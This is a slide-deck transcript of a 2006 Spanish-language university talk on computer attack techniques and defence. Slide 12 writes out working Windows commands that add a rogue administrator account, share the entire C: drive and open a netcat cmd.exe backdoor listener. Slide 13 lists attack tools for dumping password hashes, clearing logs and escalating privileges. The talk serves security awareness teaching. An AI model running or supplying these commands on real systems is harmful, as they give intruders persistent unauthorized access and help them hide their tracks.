Estrategias de Ataque y Defensa

3,466 views

Published on

Estrategias de Ataque y Defensa dirigido por el Ingeniero Siler Amador de la Unidad de Seguridad Informatica del la Universidad del Cauca.

Published in: Technology
  • Be the first to comment

Estrategias de Ataque y Defensa

  1. 1. ESTRATEGIAS DE ATAQUE EN SEGURIDAD INFORMATICA Grupo de I+D en Tecnologías de la Información (GTI) (Esp) Siler Amador Donado samador@unicauca.edu.co http://gseguridad.unicauca.edu.co
  2. 2. AGENDA Hackers vs Crackers El riesgo en la seguridad informática Pérdidas económicas por ataques informáticos Técnicas de ataque Vectores de ataque a una red Y si tienen la oportunidad… Caja de herramientas de ataque La próxima generación de Troyanos Keylogers Demo 1 (Ataque Masivo) Demo 2 (Defaced) … Y en la Unicauca que? Conclusiones
  3. 3. HACKERS VS CRACKERS As Eg es oís or an ta s Delinc uente s Eti ca Hackers Crackers en n uy u ye ns tr str Co De
  4. 4. EL RIESGO EN LA SEGURIDAD INFORMÁTICA
  5. 5. PÉRDIDAS POR ATAQUES CCS/FBI 2005
  6. 6. PÉRDIDAS POR ATAQUES CCS/FBI 2005 $67.2 billones por año $7.6 millones por hora
  7. 7. TECNICAS DE ATAQUE Wardriving: Nombre que recibe la búsqueda de redes inalámbricas para documentar su posición. Para realizar esta búsqueda se necesita como mínimo un equipo móvil (portátil) con tarjeta Wireless, y si queremos que la posición sea precisa, un GPS para pasar los datos a un mapa. Objetivo: Conectarse al punto de acceso (AP) mal configurado e ingresar a la la red local de la empresa. Herramientas: NetStumbler Kismet http://www.wardrive.net/wardriving/tools
  8. 8. TECNICAS DE ATAQUE Wardialing: Fue una técnica de los 80´s y 90´s, consitía en marcar repetidamente a modems y PBX´s disponibles en la red y de esta forma irrumpir a sistemas remotos. Objetivo: Conectarse a modems o PBX´s mal configurados e ingresar a la la red local de la empresa. Herramientas: THC-Scan 2.0 ModemScan ShokDial
  9. 9. TECNICAS DE ATAQUE Cracking: Modificar un programa para obtener beneficios. Normalmente se basa en quitar pantallas introductorias, protecciones o, como en unas modificaciones de cierto programa de comunicaciones, conseguir nuevos passwords de acceso a sistemas. Objetivo: Tener acceso al software o a la red interna. Herramientas: Las 100 mejores http://sectools.org/ Inyección SQL XSS
  10. 10. TECNICAS DE ATAQUE Ing. Social: Persuadir a otra persona (a través de diversas formas) para que nos de un dato útil para cumplir un objetivo. Este dato puede ser un password, un código, etc. incluso pueden dar nombres de familiares y fechas importantes, que siempre se usan para formar claves. Objetivo: Obtener información sensible que nos permita el acceso a la red. Herramientas: Teléfono Mucha psicología Inteligencia emocional http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
  11. 11. VECTORES DE ATAQUE A UNA RED Puntos de acceso Wardriving WIRELESS Wardialing Wardialing INTERNET Cracking MODEM MODEM RED FISICO Ing. Social
  12. 12. Y si tienen la oportunidad… Menos de 1 minuto es suficiente para: 1. Crear una cuenta con privilegios de Admin!!! 1. Abrir la consola de comandos 2. C:net user cracker siti2006 /add 3. C:net localgroup administradores cracker /add 2. Compartir toda la unidad del disco!!! 1. C:net share siti2006=c: /remark:”Demo SITI2006” 3. Colocar un programa en escucha!!! 1. http://gseguridad.unicauca.edu.co/nc.exe 2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
  13. 13. Caja de Herramientas de ataque en línea de comandos fport.exe - shows open ports and the process that owns the port iplist.exe - enumerates the ip's of the computer md5.exe - gets the md5 hash of a file pw2kget.exe - for win2k gets the password of the currently logged on user pwreveal.exe - gets the passwords of any window that has a ****** editbox regshell.exe - a commandline registry explorer/editor sendmail.exe - a commandline email sender uptime.exe - gets the machines current uptime xwhois - advanced whois lookup Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp CMDget.exe - Downloads a file from a website from user provided parameters webscr.exe - creates a snapshot from the webcam and saves it shutd.exe - program that forces shutdown/reboot of machine bnc.exe - bnc for windows (see bnc.cfg) clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect information winfo.exe - enumerates IPC$ share to collect information FTPd.exe - small ftp server for dos (see slimftpd.conf) Global.exe - process dos command on all disc/subdirs iislog.exe - clears IIS logs Info.exe - gets system information ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir) nc.exe - netcat pv.exe - process manager for dos Pwdump.exe - dumps SAM hashes scrnmode.exe - change screen mode from dos unrar.exe - unrar for dos wget.exe - wget for windows wizmo.exe - command tool (see w.txt) dwpp.exe - dial up password graber winrelay.exe - relay tcp/udp connections getad.exe - escalate to admin user in w2k pipeup.exe - escalate to admin user in w2k dnsid - identify remore dns server Agradecimientos a: Netranger Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
  14. 14. LA PRÓXIMA GENERACION DE TROYANOS KEYLOGERS… http://www.hispasec.com/laboratorio/troyano_video.htm
  15. 15. DEMO1 - ATAQUE MASIVO Escenario ZOMBIES ATACANTE MAESTRO Windows Linux Metasploit Win/XP/2K Scripts en Python SITI 2006 LAN http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
  16. 16. DEMO2 - DEFACED http://www.zone-h.com VIDEO RUSO
  17. 17. ... Y en la Unicauca que? Preocupación del departamento de sistemas de la FIET sobre la problemática de la seguridad de la información. • Electiva de seguridad informática • Área de interés en seguridad informática del GTI. (Proyectos de tesis de grado) • Legislación en comercio electrónico (Finalizado) • OBSES (Firewall Cluster Beowulf) (Finalizado) • INFORCE (Finalizado) • Antivirus-inteligente (En desarrollo) • Estudio de las tendencias predictivas sobre la escogencia de contraseñas basado en redes bayesianas (En desarrollo) • Proyecto de Auditoría informática UNICAUCA • Publicaciones
  18. 18. CONCLUSIONES Los ataques de seguridad informática a nivel mundial son aislados? Inversión en guerra informática? ECHELON, ENFOPOL, CARNÍVORO… • USA • UK • CHINA • RUSIA Los sistemas de seguridad actuales son reactivos y correctivos. • Preventivos • Inteligentes Existen demasiadas herramientas de ataque gratis y disponibles en la red. Las técnicas de ataque cabian constantemente. Segun las estadísticas es muy probable que su sistema haya sido vulnerado y usted aún no lo sepa!!!.

×